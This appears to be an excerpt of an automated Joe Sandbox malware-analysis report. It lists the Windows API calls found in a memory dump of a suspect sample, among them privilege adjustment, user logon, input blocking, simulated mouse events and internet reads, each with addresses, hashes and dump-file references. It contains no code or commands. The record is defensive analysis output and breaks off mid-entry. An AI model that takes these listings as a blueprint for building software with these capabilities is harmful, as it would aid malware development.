                      • Instruction Fuzzy Hash: A8517D715043059FD310EF25DC85E6BB7E8FF98710F50982DF599A72A2EB70A908CB92
                      APIs
                      • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00ED40D1
                      • _memset.LIBCMT ref: 00ED40F2
                      • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00ED4144
                      • CloseHandle.KERNEL32(00000000), ref: 00ED414D
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: CloseControlCreateDeviceFileHandle_memset
                      • String ID:
                      • API String ID: 1157408455-0
                      • Opcode ID: a2a5b293e03e1b33f90e47453ef068324d88352521f547d8ad3c4138881ff13d
                      • Instruction ID: e7f9e24d89909f84eda4927200f473095ccf1047cefca1e598fc7dfad1b4e046
                      • Opcode Fuzzy Hash: a2a5b293e03e1b33f90e47453ef068324d88352521f547d8ad3c4138881ff13d
                      • Instruction Fuzzy Hash: 5C11AB759012287AD7305BA59C4DFABBB7CEF84764F1041A6F908E7290D6744E84CBA4
                      APIs
                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00ECEB19
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: lstrlen
                      • String ID: ($|
                      • API String ID: 1659193697-1631851259
                      • Opcode ID: 3a52dbddd1329e1aa123055e8f265ab2e5c04c03c7c8e9ec5dfee90de7b33712
                      • Instruction ID: 614e44b1dac72dcfc8f0015c4eaeb52e1ad19fa5bbe6b7a5748f0dabd38bf717
                      • Opcode Fuzzy Hash: 3a52dbddd1329e1aa123055e8f265ab2e5c04c03c7c8e9ec5dfee90de7b33712
                      • Instruction Fuzzy Hash: AD322575A006059FCB28CF19C581EAAB7F1FF48310B15D56EE89AEB3A1D771E942CB40
                      APIs
                      • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00EE26D5
                      • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00EE270C
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Internet$AvailableDataFileQueryRead
                      • String ID:
                      • API String ID: 599397726-0
                      • Opcode ID: b42a8addd89d124bd6e5aba8b32ac314af606c99c839a63d27ea20116763cd62
                      • Instruction ID: 5b3376bfb26505a21f32c4d64c0a1bb6e6195bd4fb0d0b7c7cd3aa93bb0a805b
                      • Opcode Fuzzy Hash: b42a8addd89d124bd6e5aba8b32ac314af606c99c839a63d27ea20116763cd62
                      • Instruction Fuzzy Hash: 6541D57190024EBFEB20DE96DC85EBBB7FCEB40758F10506EF705B6140EA719E419654
                      APIs
                      • SetErrorMode.KERNEL32(00000001), ref: 00EDB5AE
                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00EDB608
                      • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00EDB655
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: ErrorMode$DiskFreeSpace
                      • String ID:
                      • API String ID: 1682464887-0
                      • Opcode ID: 16ea95d2af758aa843e38304d5037bc448d2806e2219c6bfb602b3c5e4e31e41
                      • Instruction ID: 836378fab2864bdac97aeba4f358821aaee722dbda413ed28bda10d639744313
                      • Opcode Fuzzy Hash: 16ea95d2af758aa843e38304d5037bc448d2806e2219c6bfb602b3c5e4e31e41
                      • Instruction Fuzzy Hash: 2B216235A00118EFCB00DF55D880EADBBF8FF88310F1480AAE905AB352DB319916CF51
                      APIs
                        • Part of subcall function 00E90FF6: std::exception::exception.LIBCMT ref: 00E9102C
                        • Part of subcall function 00E90FF6: __CxxThrowException@8.LIBCMT ref: 00E91041
                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EC8D0D
                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00EC8D3A
                      • GetLastError.KERNEL32 ref: 00EC8D47
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                      • String ID:
                      • API String ID: 1922334811-0
                      • Opcode ID: e365bc77795a737372fd55dba38a061d10eb4862d1d7782641831d5cb68af057
                      • Instruction ID: 7b0e31f35bf6be88041e24455408a00d80ccf44128a59f8e07e0f9cbc6685f5f
                      • Opcode Fuzzy Hash: e365bc77795a737372fd55dba38a061d10eb4862d1d7782641831d5cb68af057
                      • Instruction Fuzzy Hash: 10116DB1514209AFD7289F54DE85D6BBBFCEB44710B20852EF456A2241EF31AC418B60
                      APIs
                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00ED4C2C
                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00ED4C43
                      • FreeSid.ADVAPI32(?), ref: 00ED4C53
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: AllocateCheckFreeInitializeMembershipToken
                      • String ID:
                      • API String ID: 3429775523-0
                      • Opcode ID: 7ee9dce70d9ed97a9b7f2c9c0dca0239eee95fe2dccadad5d83dac8acab15ae4
                      • Instruction ID: 671c71b2a301a32525eab2a65aa8df202d090b04bb2b742b9f98d632a293d196
                      • Opcode Fuzzy Hash: 7ee9dce70d9ed97a9b7f2c9c0dca0239eee95fe2dccadad5d83dac8acab15ae4
                      • Instruction Fuzzy Hash: E4F03775A11208BFDB04DFE09C89ABEBBB8EF08201F0044A9E905E2281E6706A088B50
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6170ca6c63bcaa98efede01e4d3699e9a415c86dfb68d37eca32aeb1e1895611
                      • Instruction ID: 994b4e574aeec706a294ae2e4fa253f1851049477479d7f9424e60d9a35fab19
                      • Opcode Fuzzy Hash: 6170ca6c63bcaa98efede01e4d3699e9a415c86dfb68d37eca32aeb1e1895611
                      • Instruction Fuzzy Hash: 3D228D74A00216DFDB24DF64C481AAABBF1FF08304F14D1A9E85ABB351E735AD85CB91
                      APIs
                      • FindFirstFileW.KERNEL32(?,?), ref: 00EDC966
                      • FindClose.KERNEL32(00000000), ref: 00EDC996
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Find$CloseFileFirst
                      • String ID:
                      • API String ID: 2295610775-0
                      • Opcode ID: 25273a6558c6ff5d7a3a17bec0fd11a084b5b2002ed65acc075d081338416d5d
                      • Instruction ID: 4a7d9757ca57d1f3ed5acc12c8a0967ea89ad363cd917b0a61e6392d7ed9505a
                      • Opcode Fuzzy Hash: 25273a6558c6ff5d7a3a17bec0fd11a084b5b2002ed65acc075d081338416d5d
                      • Instruction Fuzzy Hash: 34115E726106009FDB10EF29D855A2AF7E9EF84324F10955EF9A9E73A1DB30AC05CB81
                      APIs
                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00EE977D,?,00EFFB84,?), ref: 00EDA302
                      • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00EE977D,?,00EFFB84,?), ref: 00EDA314
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: ErrorFormatLastMessage
                      • String ID:
                      • API String ID: 3479602957-0
                      • Opcode ID: c3f0b4f9b6cfe575ee754285653382f869a12a6a8e91a9f8eaed092536444aa7
                      • Instruction ID: 6aac9e024ea3193759e6b5ec6c4eedb8abd3fa0ba0a5655a25aa8146bd4c24fa
                      • Opcode Fuzzy Hash: c3f0b4f9b6cfe575ee754285653382f869a12a6a8e91a9f8eaed092536444aa7
                      • Instruction Fuzzy Hash: C0F0823554522DABEB209FA4CC48FEA776DFF09761F008166F908E6291D6309A44CBA1
                      APIs
                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00EC8851), ref: 00EC8728
                      • CloseHandle.KERNEL32(?,?,00EC8851), ref: 00EC873A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: AdjustCloseHandlePrivilegesToken
                      • String ID:
                      • API String ID: 81990902-0
                      • Opcode ID: e6ea6f4ee20831e334e83d23cc07144ab14a823aee92c6b1aba4be8bef4f9272
                      • Instruction ID: 3a7e1b37296ca40ed1030ff67921264bad7f8c20cba5186bac23eafa8e71467f
                      • Opcode Fuzzy Hash: e6ea6f4ee20831e334e83d23cc07144ab14a823aee92c6b1aba4be8bef4f9272
                      • Instruction Fuzzy Hash: 8BE08C32000601EFEB212B21ED08E737BE9EF00390724893DF4A6D0430DB23AC90EB10
                      APIs
                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00E98F97,?,?,?,00000001), ref: 00E9A39A
                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00E9A3A3
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: ExceptionFilterUnhandled
                      • String ID:
                      • API String ID: 3192549508-0
                      • Opcode ID: d3a1533923a4355211e04f1c234620765ef3e9a8ba2030be9860e3f392d27f1b
                      • Instruction ID: 898a0f0a8d82cde60c61cbfe15c3982d9f87859cfd1fe2a200c39f023561fcc0
                      • Opcode Fuzzy Hash: d3a1533923a4355211e04f1c234620765ef3e9a8ba2030be9860e3f392d27f1b
                      • Instruction Fuzzy Hash: 1DB09231055208AFCA102B92EC09BA83F6AEF84AA2F404020F60D94060EB625454CA95
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 17b0df1f3d3cf0f75fd7b06608c2d97b4929385d1070cf5eb02f056ac87af66b
                      • Instruction ID: 0bdc4877c84d47f63c596da6b0c3431c895fa5e12972ce2df737262353e7dad0
                      • Opcode Fuzzy Hash: 17b0df1f3d3cf0f75fd7b06608c2d97b4929385d1070cf5eb02f056ac87af66b
                      • Instruction Fuzzy Hash: 55321562D69F054DDB23A634D832336B248AFB73D4F15E737E819F59AAEB28D4835100
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 260ac2c6e0349d2853333388215821b06d7d33938266ba421d52f8139d747ebb
                      • Instruction ID: b0c45ff74c3257430dff48638cc421c35fe2200d2c55e16288a5784cf2f9ad5a
                      • Opcode Fuzzy Hash: 260ac2c6e0349d2853333388215821b06d7d33938266ba421d52f8139d747ebb
                      • Instruction Fuzzy Hash: 95B1FF20E2AF454DD32396398831336BA9CBFBB2D5F52D71BFC2674D62EB2285835141
                      APIs
                      • __time64.LIBCMT ref: 00ED8B25
                        • Part of subcall function 00E9543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00ED91F8,00000000,?,?,?,?,00ED93A9,00000000,?), ref: 00E95443
                        • Part of subcall function 00E9543A: __aulldiv.LIBCMT ref: 00E95463
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Time$FileSystem__aulldiv__time64
                      • String ID:
                      • API String ID: 2893107130-0
                      • Opcode ID: 734b383ad7d7dab20506a125d6c9f4be273cebcd9f43e783a7dcc2abac1e87cd
                      • Instruction ID: 97bc6d92407ff2a56ed0708dd5f2f97723bbd857ecc88d3c7e314c3683c8788e
                      • Opcode Fuzzy Hash: 734b383ad7d7dab20506a125d6c9f4be273cebcd9f43e783a7dcc2abac1e87cd
                      • Instruction Fuzzy Hash: 4E21E472635614CFC729CF29D841B52B3E1EBA4321B289E6DD0F5CB2D0CA34B945DB94
                      APIs
                      • BlockInput.USER32(00000001), ref: 00EE4218
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: BlockInput
                      • String ID:
                      • API String ID: 3456056419-0
                      • Opcode ID: fa8d6dea60c33dbede4449766e45a20c689f2851844633a8fee59051f570c311
                      • Instruction ID: 444afd6b7b122cc6707724f159413acdd514ac82b50304e12d24871aa77944b6
                      • Opcode Fuzzy Hash: fa8d6dea60c33dbede4449766e45a20c689f2851844633a8fee59051f570c311
                      • Instruction Fuzzy Hash: 2DE04FB12402189FC710EF5AD844A9AF7E8AF98760F01D026FD49E7362DA70E841CBA0
                      APIs
                      • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00ED4F18
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: mouse_event
                      • String ID:
                      • API String ID: 2434400541-0
                      • Opcode ID: 1a5f2d0e1fe863591ba48da53189093789085f8c1229fa1c0dc071204283737f
                      • Instruction ID: 6911663978468385fb8ac7df73d0ffe2ee4c1afca8cd9d81a0fb8cef29ced08d
                      • Opcode Fuzzy Hash: 1a5f2d0e1fe863591ba48da53189093789085f8c1229fa1c0dc071204283737f
                      • Instruction Fuzzy Hash: FAD05EF03642053FFC284B20AC0FFB60208E3A0785F84798B7201B96E1A8F16C02E035
                      APIs
                      • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00EC88D1), ref: 00EC8CB3
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: LogonUser
                      • String ID:
                      • API String ID: 1244722697-0
                      • Opcode ID: cb7c75202da57eb49d2b1ba1b5b3abefb729d515240fb66c60f67b179cf06eaa
                      • Instruction ID: 6a6306f716ffbc54628e2d296d6a4cb36a7b222ab39ffd0a6fa98da841a7433d
                      • Opcode Fuzzy Hash: cb7c75202da57eb49d2b1ba1b5b3abefb729d515240fb66c60f67b179cf06eaa
                      • Instruction Fuzzy Hash: ABD05E3226050EAFEF018EA4DC01EBE3B69EB04B01F408111FE15D50A1C775D835EB60
                      APIs
                      • GetUserNameW.ADVAPI32(?,?), ref: 00EB2242
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: NameUser
                      • String ID:
                      • API String ID: 2645101109-0
                      • Opcode ID: 1c461672cfc400a9934ee4e39a23955952f0f3670763bd1937c68470dac843d8
                      • Instruction ID: bef88859a715bdbd02b822b5612ab5575e4f15a98092b5b8965cdf3cb3ed9353
                      • Opcode Fuzzy Hash: 1c461672cfc400a9934ee4e39a23955952f0f3670763bd1937c68470dac843d8
                      • Instruction Fuzzy Hash: E6C002B1810109DBDB05DB90D998DEA77BCAB04314F504095A101B2100DA749B448A61
                      APIs
                      • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00E9A36A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: ExceptionFilterUnhandled
                      • String ID:
                      • API String ID: 3192549508-0
                      • Opcode ID: 41b2f2f19c0d3802d0cd7f3b6cd2abe2bdbdbd7ffb1f17cfaf0d6c4c8a32b92d
                      • Instruction ID: aa7aabf9fa592efd86b9ab76201eb1045df34d03a1a7d742b7b0972e56258830
                      • Opcode Fuzzy Hash: 41b2f2f19c0d3802d0cd7f3b6cd2abe2bdbdbd7ffb1f17cfaf0d6c4c8a32b92d
                      • Instruction Fuzzy Hash: 47A0113000020CAB8A002B82EC088A8BFAEEB802A0B008020F80C80022AB32A8208A80
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
